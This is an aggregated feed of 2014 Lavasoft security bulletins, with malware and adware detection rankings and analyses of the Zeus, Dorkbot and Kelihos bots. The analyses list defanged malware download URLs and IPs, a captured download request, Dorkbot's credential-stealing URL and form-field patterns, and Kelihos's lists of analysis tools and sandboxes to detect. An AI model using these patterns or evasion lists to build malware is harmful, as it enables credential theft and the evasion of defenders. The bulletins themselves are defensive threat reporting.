Quantcast
Viewing all 361 articles
Browse latest View live

Lavasoft Security Bulletin - April 2014: Top Threats

April 30, 2014, 6:36 am
$
0
0

Top 20 Blocked Malware

PositionAd-Aware detection% of all threatsChange in ranking
1Win32.Trojan.Agent74.59%-6.72%
2Trojan.Win32.Generic!BT14.68%+5.79%
3Jeefo0.76%+0.54%
4Trojan.Win32.Generic.pak!cobra0.70%+0.19%
5Virus.Win32.Ramnit.a0.67%new
6Malware.JS.Generic0.66%+0.13%
7HackTool.Win32.Keygen0.60%+0.32%
8Worm.LNK.Jenxcus.aha0.57%-0.26%
9Win32.TrojanDropper.Agent/A0.45%new
10Virus.Win32.Sality.at0.41%+0.07%
11Trojan.Win32.Jpgiframe0.32%+0.11%
12Trojan.Win32.Generic!SB.00.31%+0.15%
13Virus.Win32.Sality.ah0.23%new
14Trojan-Clicker.HTML.RemoteScript0.23%new
15Trojan-Dropper.Win32.Agent.aeu0.15%new
16Virus.Win32.Expiro.i0.13%new
17Trojan.Win32.Ramnit.c0.12%-0.22%
18Trojan.Win32.AutoIT.gen0.11%new
19Trojan.Win32.Packer.PESpinv1.320.10%new
20Backdoor.Win32.Bifrose.fsi0.09%new

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - April 2014

The table below ranks the most prevalent families seen in April.

PositionAd-Aware detection% of all threatsChange in ranking
1Trojan.Win32.Generic!BT33.87%+0.41%
2Virus.Win32.Expiro.gen7.52%+0.17%
3Virus.Win32.Virut.ce6.71%+3.41%
4Trojan-Downloader.Win32.LoadMoney.u5.16%-0.85%
5Trojan.Win32.Generic.pak!cobra3.01%-0.10%
6Trojan.Win32.Ircbot!cobra 0.86%-0.18%
7InstallCore0.82%new
8Trojan.Win32.Generic!SB.00.77%+0.41%
9Adware.Bettersurf 0.77%new
10Adware.OutBrowse0.58%-0.06%
11Optimum Installer 0.53%new
12Click run software0.47%new
13Trojan.Win32.DelfInject.m 0.36%-0.07%
14Trojan.Win32.LoadMoney.f0.34%+0.02%
15Trojan.StartPage0.22%new
16FraudTool.Win32.InternetProtection.ek!a 0.21%-0.05%
17Worm.Win32.Gamarue.z 0.21%+0.02%
18Trojan.HTML.Ransomware.b0.20%-0.05%
19Backdoor.MSIL.Bladabindi.a0.20%+0.02%
20Malware.JS.Generic0.20%new

New malicious programs entered the Top 20

In April Lavasoft Malware Analysis System detected the following fake antiviruses. This polymorphic Fake AV family was previously described in February 2014

Image may be NSFW.
Clik here to view.

Fake AV (MD5: 9e42968882b42a4f4418df8bb5301f65, 36f0e8ae4f8e14b35757136cc2200952, 78912dc0c6406105343ead0656b74f8a, aa1c742eafac0c819c3fb32f325c3be3, c3e6595842fd0366d87790c814b28af2, d6cb2f4d4f2b1db9087ed0f081cca1c5, d12bc79b2d8714fe80600730bc200138, df7721c0e49fdd1f14b43b1d3c6d3424)

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

PositionAd-Aware detection% of all threatsChange in ranking
1MyWebSearch17.07%+1.19%
2Conduit16.82%-6.21%
3Win32.PUP.Bandoo14.34%+6.93%
4Adware.Linkury9.21%+2.32%
5Adware.JS.Conduit9.19%-0.99%
6Adware.SaveSense2.52%-1.33%
7Crossrider1.96%-0.23%
8Win32.Toolbar.Iminent1.72%-0.17%
9Adware.Win32.Multiplug.c1.38%new
10DomaIQ1.23%+0.09%
11Adware.Agent1.12%-0.24%
12Iminent1.08%-0.81%
13Adware.DealPly1.01%-0.14%
14SweetIM0.95%-0.11%
15InstallCore0.82%-0.08%
16Opencandy0.80%-0.20%
17Win32.Adware.Agent0.75%-0.61%
18Yontoo0.70%new
19InstallCore.b0.69%+0.10%
20Montiera0.64%-0.03%

Top20 PUPs detected on user’s PC

Operating Systems

Image may be NSFW.
Clik here to view.

Infections by OS

Geographic Location

Image may be NSFW.
Clik here to view.

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Read also:
Lavasoft Security Bulletin - April 2014: Bot Review.

Zeus Downloader Comes as GoogleUpdate.

Search

Lavasoft Security Bulletin - April 2014: Bot Review

April 30, 2014, 6:37 am
$
0
0

Bot Review

Table: Bots under analysis (April 2014, Lavasoft MAS).


Bot's nameMarch 2014April 2014Changes
Zbot6556862.3%
Cycbot2910-2.4%
Kelihos66680.2%
NrgBot/Dorkbot741499.3%
Blazebot/Rbot135-1.0%
Shiz470.4%
Total620635



Bot distribution in April:

Image may be NSFW.
Clik here to view.

Kelihos. You can find the latest Kelihos description here.

Cycbot. You can find the latest Cycbot description here.

Shiz. The latest description is here.

Zbot. We saw a significant increase of Zeus bots from 65 analyzed samples in March up to 568 in April. Read more about a Zeus variant found in April here.

NrgBot/Dorkbot. The number of Dorkbots has been increased twofold since March. You can find the latest description here.

Blazebot/Rbot. The latest description is available in Malware Encyclopedia.

Read also:
Zeus Downloader Comes as GoogleUpdate.

Lavasoft Security Bulletin - April 2014: Top Threats.

Lavasoft Security Bulletin - May 2014: Top Threats

May 30, 2014, 2:07 am
$
0
0

Top20 Blocked Malware

PositionAd-Aware detection% of all threatsChange in ranking
1Win32.Trojan.Agent66.35%-8.24%
2Trojan.Win32.Generic!BT20.66%+5.98%
3Exploit.PDF.Pdfjs.aei2.84%new
4Virus.Win32.Ramnit.a1.46%+0.79%
5Worm.LNK.Jenxcus.aha0.66%+0.09%
6Malware.JS.Generic0.54%-0.12%
7Trojan.Win32.Ramnit.c0.50%+0.38%
8Trojan.Win32.Generic.pak!cobra0.42%-0.28%
9Trojan.Win32.Generic!SB.00.35%+0.04%
10Virus.Win32.Ramnit.b0.33%new
11HackTool.Win32.Keygen0.33%-0.27%
12Virus.Win32.Sality.at0.32%-0.09%
13Email-Worm.Win32.Brontok.a0.26%new
14Virus.Win32.Sality.ek0.24%new
15Trojan.Win32.Jpgiframe0.22%-0.10%
16Virus.Win32.Virut.ce0.21%new
17FraudTool.Win32.FakeVimes!VB0.20%new
18Trojan-Clicker.HTML.Iframe0.19%new
19Win32.Worm.Autorun/A0.18%new
20Virus.Win32.Expiro.cn0.16%new

The Top 20 malicious programs blocked on PCs

Malware Prevalence Table - May 2014

The table below ranks the most prevalent families seen in May.

PositionAd-Aware detection% of all threatsChange in ranking
1Trojan.Win32.Generic!BT33.79%-0.08%
2Virus.Win32.Virut.ce6.72%+0.01%
3Virus.Win32.Expiro.gen5.82%-1.70%
4Trojan-Downloader.Win32.LoadMoney.u4.59%-0.57%
5Trojan.Win32.Generic.pak!cobra2.81%-0.20%
6InstallCore1.75%+0.93%
7Trojan.Win32.Generic!SB.00.83%+0.06%
8Trojan.Win32.LoadMoney.f0.78%+0.44%
9Trojan.Win32.Ircbot!cobra 0.73%-0.13%
10Worm.Win32.Picsys.c0.49%new
11Adware.OutBrowse0.49%-0.09%
12Optimum Installer 0.48%-0.05%
13Conduit0.48%new
14Click run software0.40%-0.07%
15Vittalia Installer 0.39%new
16Trojan.Win32.DelfInject.m 0.31%-0.05%
17Trojan.StartPage0.27%+0.05%
18Worm.Win32.Gamarue.z 0.25%+0.04%
19Backdoor.MSIL.Bladabindi.a0.23%+0.03%
20FraudTool.Win32.InternetProtection.ek!a 0.18%-0.03%

New malicious programs entered the Top 20

This month we discovered several new Fake-AVs that have GUIs similar to the ones below. One of them – “Open Cloud AV” - even utilizes a cloud security concept.

Image may be NSFW.
Clik here to view.

Fake AV (MD5: 1c01c7a1c0d18c376d295522f096a5cb) is detected by Ad-Aware as Gen:Variant.Kazy.73805

Image may be NSFW.
Clik here to view.

Fake AV (MD5: 5deeff05129a1d4aaf5bac9091d9058f) is detected by Ad-Aware as Trojan.Generic.KD.369558

Image may be NSFW.
Clik here to view.

Fake AV (MD5: 6882c02d396d287ddfb3717bb717bead) is detected by Ad-Aware as Trojan.FakeAlert.CYD

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

PositionAd-Aware detection% of all threatsChange in ranking
1Conduit19.38%+2.56%
2MyWebSearch15.30%-1.77%
3Win32.PUP.Bandoo12.33%-2.01%
4Adware.JS.Conduit8.31%-0.88%
5Adware.Linkury7.36%-1.85%
6Yontoo3.41%+2.71%
7Crossrider2.25%+0.29%
8Montiera1.68%+1.04%
9Adware.SaveSense1.61%-0.91%
10Win32.Toolbar.Iminent1.56%-0.16%
11DomaIQ1.34%+0.11%
12Adware.Win32.Multiplug.c1.32%-0.06%
13BetterInstaller1.10%new
14Win32.Adware.Agent1.07%+0.32%
15Iminent0.99%-0.73%
16SweetIM0.82%-0.13%
17Opencandy0.78%-0.02%
18Adware.DealPly0.77%-0.24%
19InstallCore.b0.76%+0.07%
20InstallCore0.75%-0.07%

Top20 PUPs detected on user’s PC

Operating Systems

Image may be NSFW.
Clik here to view.

Infections by OS

Geographic Location

Image may be NSFW.
Clik here to view.

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Read also:
Lavasoft Security Bulletin - May 2014: Bot Review.
Kelihos Adopts Anti-Analysis Technique.

Lavasoft Security Bulletin - May 2014: Bot Review

May 30, 2014, 2:29 am
$
0
0

Bot Review

Table: Bots under analysis (May 2014, Lavasoft MAS).


Bot's nameApril 2014May 2014Changes
Zbot568149-51.3%
Cycbot10191.1%
Kelihos6847249.4%
NrgBot/Dorkbot1491692.4%
Blazebot/Rbot52-0.4%
Shiz76-0.1%
Total807818



Bot distribution in May:

Image may be NSFW.
Clik here to view.

Kelihos. This month we see a significant increase of Kelihos backdoors discovered in the Lab: 58% in May against 8% in April. You can read more about adoption of anti-analysis techniques by Kelihos bot here.

Cycbot. You can find the latest Cycbot description here.

Shiz. The latest description is here.

Zbot. Read more about Zeus variant found in May in Malware Encyclopedia. 30% of all detected Zeus samples use Tor client.

The Zeus continues downloading its files in an encrypted form:

URLIP
hxxp://highclassdelhiescorts.in/images/css/al0302.encImage may be NSFW.
Clik here to view. 103.8.127.189
hxxp://manjena.com/images/al0302.encImage may be NSFW.
Clik here to view. 184.107.194.106


This time the Canadian server replied with the ZZP file (329 288 bytes in size):

GET /images/al0302.enc HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: manjena.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 24 May 2014 06:00:28 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Last-Modified: Mon, 03 Feb 2014 15:36:31 GMT
ETag: "a548037-50648-4f18249ad9dc0"
Accept-Ranges: bytes
Content-Length: 329288
Connection: close
Content-Type: text/plain


ZZP..~.:.T.tS...W.......S..vS..OJ.)w_..w....Z...S...r... ...!...2..W0.
..<..w1...&...S..3....<D..}..}w.GwWF:..'T....X..3 Q..3...pl6.wT.
..U6.upP.x|.TM...p[6..S...0..HFo.w...;R..P[. %V.!wP..|R..w;.....C~...u
CD..V..d...wS..1R...P..qQ^".2..x....FB.qP..w.m.w{..q..usr..o.H...G@.F.

<<< skipped >>>

After decryption with Zeus decryption tool (ZeusDecryptor) we discovered usual randomly named application (MD5: f1f03b73b6c32ef28514d740073a4941, 386 560 bytes in size):

%Documents and Settings%\%current user%\Application Data\Idaz\ecyche.exe

The downloader also copies itself as “pdfupdate.exe” (MD5: 0a2947abe4c9e6d539066993690c8a38, 19 224 bytes in size) to the %Temp% folder and executes it.

NrgBot/Dorkbot. The number of Dorkbots continues growing since March. You can find the latest description here.

Currently the backdoor uses the following expressions to steal logins and passwords for popular services:

iknowthatgirl*/members*, *youporn.*/login*, *members.brazzers.com*, *bcointernacional*login*, *:2222/CMD_LOGIN*, *whcms*dologin* , *:2086/login*, *:2083/login*, *:2082/login*, *webnames.ru/*user_login*, Webnames, *dotster.com/*login*, loginid, *enom.com/login*, login.Pass, login.User, *login.Pass=*, *1and1.com/xml/config*, *moniker.com/*Login*, LoginPassword, LoginUserName, *LoginPassword=*, *namecheap.com/*login*, loginname, *godaddy.com/login*, Password, *Password=*, *alertpay.com/login*, *netflix.com/*ogin*, *thepiratebay.org/login*, *torrentleech.org/*login*, *vip-file.com/*/signin-do*, *sms4file.com/*/signin-do*, *letitbit.net*, *what.cd/login*, *oron.com/login*, *filesonic.com/*login*, *speedyshare.com/login*, *uploaded.to/*login*, *uploading.com/*login*, loginUserPassword, loginUserName, *loginUserPassword=*, *fileserv.com/login*, *hotfile.com/login*, *4shared.com/login*, txtpass, *txtpass=*, *netload.in/index*, *freakshare.com/login*, login_pass, *login_pass=*, *mediafire.com/*login*, *sendspace.com/login*, *megaupload.*/*login*, *depositfiles.*/*/login*, *signin.ebay*SignIn, *officebanking.cl/*login.asp*, *secure.logmein.*/*logincheck*, session[password], *password]=*, *twitter.com/sessions, txtPassword, *&txtPassword=*, *.moneybookers.*/*login.pl, *runescape*/*weblogin*, *&password=*, *no-ip*/login*, *steampowered*/login*, quick_password, *hackforums.*/member.php, *facebook.*/login.php*, *login.yahoo.*/*login*, passwd, login, *passwd=*, *login.live.*/*post.srf*, TextfieldPassword, *TextfieldPassword=*, *gmx.*/*FormLogin*, *Passwd=*, FLN-Password, *FLN-Password=*, *pass=*, *bigstring.*/*index.php*, *screenname.aol.*/login.psp*, password, loginId, *password=*, *aol.*/*login.psp*, Passwd, *google.*/*ServiceLoginAuth*, login_password, login_email, *login_password=*, *paypal.*/webscr?cmd=_login-submit*, *bebo.*/c/profile/comment_post.json, *bebo.*/mail/MailCompose.jsp*, *friendster.*/sendmessage.php*, *friendster.*/rpc.php, *vkontakte.ru/mail.php, *vkontakte.ru/wall.php, *vkontakte.ru/api.php, *facebook.*/ajax/*MessageComposerEndpoint.php*, msg_text, *facebook.*/ajax/chat/send.php*

We see the following online services attacked in the list above:

iknowthatgirl.com, youporn.com, brazzers.com, bancointernacional.com.ec, webnames.ru, dotster.com, enom.com, 1and1.com, moniker.com, namecheap.com, godaddy.com, alertpay.com, netflix.com, thepiratebay.org, torrentleech.org, vip-file.com, sms4file.com, letitbit.net, what.cd, oron.com, filesonic.com, speedyshare.com, uploaded.to, uploading.com, fileserv.com, hotfile.com, 4shared.com, netload.in, freakshare.com, mediafire.com, sendspace.com, megaupload.com, depositfiles.com, ebay.com, officebanking.cl, logmein.com, twitter.com, moneybookers.com, runescape.com, hackforums.com, facebook.com, yahoo.com, live.com, gmx.com, aol.com, google.com, paypal.com, bebo.com, friendster.com, vkontakte.ru, facebook.com

Among them we met porn websites, domain registrars, online banking services, file sharing services, online games, and popular social networks.

Blazebot/Rbot. The latest description is available in Malware Encyclopedia.

Read also:
Lavasoft Security Bulletin - May 2014: Top Threats.
Kelihos Adopts Anti-Analysis Technique.

Kelihos Adopts Anti-Analysis Technique

May 30, 2014, 2:32 am
$
0
0

Since the end of April we discovered that Kelihos adopted an anti-analysis functionality. The backdoor detects the presence of the following processes running on a computer that are related to malware analysis tools (network sniffers, debuggers, screen recorders), virtual platforms (VirtualBox) and sandboxes (Sandboxie):

cv.exe
irise.exe
IrisSvc.exe
wireshark.exe
dumpcap.exe
ZxSniffer.exe
Aircrack-ng Gui.exe
observer.exe
tcpdump.exe
WinDump.exe
wspass.exe
Regshot.exe
ollydbg.exe
PEBrowseDbg.exe
windbg.exe
DrvLoader.exe
SymRecv.exe
Syser.exe
apis32.exe
VBoxService.exe
VBoxTray.exe
SbieSvc.exe
SbieCtrl.exe
SandboxieRpcSs.exe
SandboxieDcomLaunch.exe
SUPERAntiSpyware.exe
ERUNT.exe
ERDNT.exe
EtherD.exe
Sniffer.exe
CamtasiaStudio.exe
CamRecorder.exe
vba32arkit.exe

The same verification is done for the registry keys:

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wireshark.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Win Sniffer_is1
SOFTWARE\Classes\PEBrowseDotNETProfiler.DotNETProfiler
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Debugging Tools for Windows (x86)
SYSTEM\CurrentControlSet\Services\SDbgMsg
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APIS32
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sandboxie
SOFTWARE\SUPERAntiSpyware.com
SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ERUNT_is1

Image may be NSFW.
Clik here to view.

Supposedly these lists were partly borrowed from the Simda backdoor.

Kelihos continues preferring Ukrainian servers to download new updates (you can read more about a geographic distribution of the botnet in past
here):

URLCountry
hxxp://178.150.139.157/mod1/zlubob1.exeImage may be NSFW.
Clik here to view.
hxxp://5.105.69.96/mod2/zlubob1.exeImage may be NSFW.
Clik here to view.
hxxp://213.111.239.19/online.htmImage may be NSFW.
Clik here to view.
hxxp://194.44.49.98/mod1/zlubob1.exeImage may be NSFW.
Clik here to view.


The downloaded file “zlubob1.exe” is 612 352 bytes (MD5: b4f8a1e28e762567bcf3ade3405259df) and can provide Remote Desktop connection to the attacker via WTS (Windows Terminal Server) API mentioned in the import table.

Image may be NSFW.
Clik here to view.

The registry keys enumeration and password files searching is the reason of a high CPU load - 99%:

Image may be NSFW.
Clik here to view.

As we already wrote in the blog it searches for passwords stored in configuration and cache files of FTP clients and Internet browsers:

WISE FTP, IE, Mozilla Firefox, Chrome, Chromium, Bromium, Nichrome, RockMelt, Comodo, ChromePlus, browser.yandex, LeechFTP, Odin, WinFTP, FTPGetter, Estsoft\ALFTP, Staff, Blaze, NetFile, GoFTP, 3D-FTP, EasyFTP, XFTP, BlazeFTP, SiteDesigner, Whisper Technology\FTP Surfer, VanDyke\SecureFX, Fling, NetDrive, FTP Explorer, FTPRush, UltraFXP, AceBIT, Flock\Browser, FTP-Now

Image may be NSFW.
Clik here to view.

Image may be NSFW.
Clik here to view.

We may conclude that the Kelihos botnet is growing again and it has already eaten the biggest piece of botnets pie – 58% in May 2014. The bot has the same thief payload. However, it is armored now with an anti-analysis functionality that will complicate the reversing and debugging a backdoor.

Image may be NSFW.
Clik here to view.

Read also:
Lavasoft Security Bulletin - May 2014: Bot Review.

Lavasoft Security Bulletin - May 2014: Top Threats.

Lavasoft Security Bulletin - June 2014: Top Threats

June 30, 2014, 10:52 pm

Lavasoft Security Bulletin - June 2014: Bot Review

June 30, 2014, 11:36 pm

Beware of FIFA World Cup 2014 Scams

July 1, 2014, 3:30 am
$
0
0

The FIFA World Cup 2014 in Brazil is being used as a lure for numerous tricks aimed to get your money or show you unsolicited advertisements.
Last month Symantec wrote about an email scam where the scammers offered free tickets for the World Cup.

read more

Search

Lavasoft Security Bulletin - July 2014: Top Threats

July 31, 2014, 6:02 am

Lavasoft Security Bulletin - July 2014: Bot Review

July 31, 2014, 6:15 am

Bundled Software: Good or Evil?

August 2, 2014, 11:41 pm

Lavasoft Security Bulletin - August 2014: Bot Review

August 29, 2014, 6:24 am

Lavasoft Security Bulletin - August 2014: Top Threats

August 29, 2014, 6:24 am

The PUP That Can Detect Anti-Malware Programs

August 29, 2014, 6:45 am
$
0
0

In last month’s Security Bulletin we talked about issues surrounding bundled software and explained why AV companies often detect such programs as potentially unwanted programs a.k.a ‘PUP’.

This month we are going to walk through an interesting example of bundled software called Media Player by VideoBuzz (detected by Ad-Aware as Gen:Variant.Application.MediaFinder.2), which brings hidden surprises to a user.

read more

Lavasoft Security Bulletin - September 2014: Top Threats

October 3, 2014, 6:01 am
Search

Lavasoft Security Bulletin - September 2014: Bot Review

October 3, 2014, 6:12 am

PUPs with Rootkit

October 3, 2014, 6:13 am
$
0
0

We discovered numerous cases of installing PUPs that contain a rootkit component to protect its files, registry keys and processes in a system. This component is used defend itself from removal by competing PUPs and automated PUP removal tools.

We are going to consider two PUPs that utilize the same rootkit to protect its files and registry keys:

read more

Lavasoft Security Bulletin - October 2014: Top Threats

November 3, 2014, 5:44 am

Lavasoft Security Bulletin - October 2014: Bot Review

November 3, 2014, 5:54 am

Potentially Unwanted Program Self-Protection Technologies

November 3, 2014, 5:55 am
Viewing all 361 articles
Browse latest View live
Search